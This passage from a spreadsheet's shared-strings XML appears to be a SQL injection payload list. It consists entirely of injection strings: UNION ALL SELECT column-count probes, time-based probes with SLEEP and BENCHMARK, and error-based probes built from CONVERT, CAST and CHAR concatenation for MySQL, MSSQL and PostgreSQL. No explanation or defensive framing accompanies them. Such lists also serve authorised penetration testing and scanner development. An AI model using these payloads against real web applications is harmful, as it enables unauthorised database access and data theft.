    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT @@VERSION,SLEEP ( 5 ) ,3</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT @@VERSION,SLEEP ( 5 ) ,USER (  ) ,4</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT @@VERSION,SLEEP ( 5 ) ,USER (  ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,5</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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SELECT @@VERSION,SLEEP ( 5 ) ,"'3</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT @@VERSION,SLEEP ( 5 ) ,"'3'"#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT @@VERSION,SLEEP ( 5 ) ,USER (  ) ,4#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT @@VERSION,SLEEP ( 5 ) ,USER (  ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,5#</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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ALL SELECT USER (  ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT SLEEP ( 5 ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT USER (  ) ,SLEEP ( 5 ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  -- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT @@VERSION,USER (  ) ,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--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</si>
  <si>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</si>
  <si>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,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 88  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 88 ) +CHAR ( 88  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88 ) +CHAR ( 88  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75 ) +CHAR ( 116  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75 ) +CHAR ( 116 ) +CHAR ( 69  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75 ) +CHAR ( 116 ) +CHAR ( 69 ) +CHAR ( 65  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75 ) +CHAR ( 116 ) +CHAR ( 69 ) +CHAR ( 65 ) +CHAR ( 113  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75 ) +CHAR ( 116 ) +CHAR ( 69 ) +CHAR ( 65 ) +CHAR ( 113 ) +CHAR ( 112  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75 ) +CHAR ( 116 ) +CHAR ( 69 ) +CHAR ( 65 ) +CHAR ( 113 ) +CHAR ( 112 ) +CHAR ( 106  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75 ) +CHAR ( 116 ) +CHAR ( 69 ) +CHAR ( 65 ) +CHAR ( 113 ) +CHAR ( 112 ) +CHAR ( 106 ) +CHAR ( 107  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 73 ) +CHAR ( 78 ) +CHAR ( 74 ) +CHAR ( 69 ) +CHAR ( 67 ) +CHAR ( 84 ) +CHAR ( 88 ) +CHAR ( 118 ) +CHAR ( 120 ) +CHAR ( 80 ) +CHAR ( 75 ) +CHAR ( 116 ) +CHAR ( 69 ) +CHAR ( 65 ) +CHAR ( 113 ) +CHAR ( 112 ) +CHAR ( 106 ) +CHAR ( 107 ) +CHAR ( 113  )  )   ) -- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 88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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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UNION ALL SELECT NULL </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5650 = CONVERT ( INT, ( UNION ALL SELECTCHAR ( 88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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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SELECT CHAR ( 113 ) +CHAR ( 106 ) +CHAR ( 122 ) +CHAR ( 106 ) +CHAR ( 113 ) + ( SELECT  ( CASE WHEN  ( 5650 = 5650 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 113 ) +CHAR ( 112 ) +CHAR ( 106 ) +CHAR ( 107 ) +CHAR ( 113  )  )   ) </t>
  </si>
  <si>
    <t xml:space="preserve"> AND 3516 = CAST  (  (  CHR ( 113 ) ||CHR ( 106 ) ||CHR ( 122 ) ||CHR ( 106 ) ||CHR ( 113  )  )  || ( SELECT  ( CASE WHEN  ( 3516 = 3516 )  THEN 1 ELSE 0 END  )  )  ::text|| ( CHR ( 113 ) ||CHR ( 112 ) ||CHR ( 106 ) ||CHR ( 107 ) ||CHR ( 113  )  )   AS NUMERIC ) </t>
  </si>
  <si>
    <t xml:space="preserve"> AND  ( SELECT 4523 FROM ( SELECT COUNT ( * ) ,CONCAT ( 0x716a7a6a71, ( SELECT  ( ELT ( 4523 = 4523,1  )  )   ) ,0x71706a6b71,FLOOR ( RAND ( 0 ) *2  )  )  x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x ) a ) </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT CHAR ( 113 ) +CHAR ( 106 ) +CHAR ( 122 ) +CHAR ( 106 ) +CHAR ( 113 ) +CHAR ( 110 ) +CHAR ( 106 ) +CHAR ( 99 ) +CHAR ( 73 ) +CHAR ( 66 ) +CHAR ( 109 ) +CHAR ( 119 ) +CHAR ( 81 ) +CHAR ( 108 ) +CHAR ( 88 ) +CHAR ( 113 ) +CHAR ( 112 ) +CHAR ( 106 ) +CHAR ( 107 ) +CHAR ( 113 ) ,NULL-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX'</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22</t>
  </si>
  <si>
